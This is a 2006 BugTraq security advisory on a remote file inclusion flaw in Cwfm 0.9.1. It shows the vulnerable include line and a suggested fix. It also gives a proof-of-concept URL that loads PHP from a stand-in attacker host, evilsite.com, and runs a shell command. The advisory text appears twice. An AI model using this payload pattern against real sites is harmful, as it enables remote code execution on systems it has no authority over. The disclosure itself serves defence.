BugTraq
Back to list
|
Post reply
Cwfm <= 0.9.1 (Language) Remote File Inclusion Vulnerability
Aug 08 2006 08:13PM
philipp niedziela gmx de
+--------------------------------------------------------------------
+
+ Cwfm-0.9.1 (Language) Remote File Inclusion
+
+ Original advisory:
+
+ http://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1_(Language)_Re
mote_File_Inclusion.htm
+
+--------------------------------------------------------------------
+
+ Affected Software .: Cwfm 0.9.1
+ Venedor ...........: http://cwfm.sourceforge.net/
+ Class .............: Remote File Inclusion in /CheckUpload.php
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+ http://www.bb-pcsecurity.de
+
+--------------------------------------------------------------------
+
+ Code /CheckUpload.php
+
+ .....
+ session_start();
+ include_once("Global.php");
+ //include_once("lang/$Language.php");
+ include_once("$Language.php");
+ .....
+
+--------------------------------------------------------------------
+
+ $Language is not properly sanitized before being used.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Declare $Language before using, include config-file or
+ denie direct access to the vuln file.
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/CheckUpload.php?Language=http://evilsite.com/dblib.php/&
cmd=ls
+
+--------------------------------------------------------------------
+
+ Note:
+ Venedor contacted, but no response. So do a dirty patch.
+
+-------------------------[ E O F ]----------------------------------
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
+
+ Cwfm-0.9.1 (Language) Remote File Inclusion
+
+ Original advisory:
+
+ http://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1_(Language)_Re
mote_File_Inclusion.htm
+
+--------------------------------------------------------------------
+
+ Affected Software .: Cwfm 0.9.1
+ Venedor ...........: http://cwfm.sourceforge.net/
+ Class .............: Remote File Inclusion in /CheckUpload.php
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+ http://www.bb-pcsecurity.de
+
+--------------------------------------------------------------------
+
+ Code /CheckUpload.php
+
+ .....
+ session_start();
+ include_once("Global.php");
+ //include_once("lang/$Language.php");
+ include_once("$Language.php");
+ .....
+
+--------------------------------------------------------------------
+
+ $Language is not properly sanitized before being used.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Declare $Language before using, include config-file or
+ denie direct access to the vuln file.
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/CheckUpload.php?Language=http://evilsite.com/dblib.php/&
cmd=ls
+
+--------------------------------------------------------------------
+
+ Note:
+ Venedor contacted, but no response. So do a dirty patch.
+
+-------------------------[ E O F ]----------------------------------
[ reply ]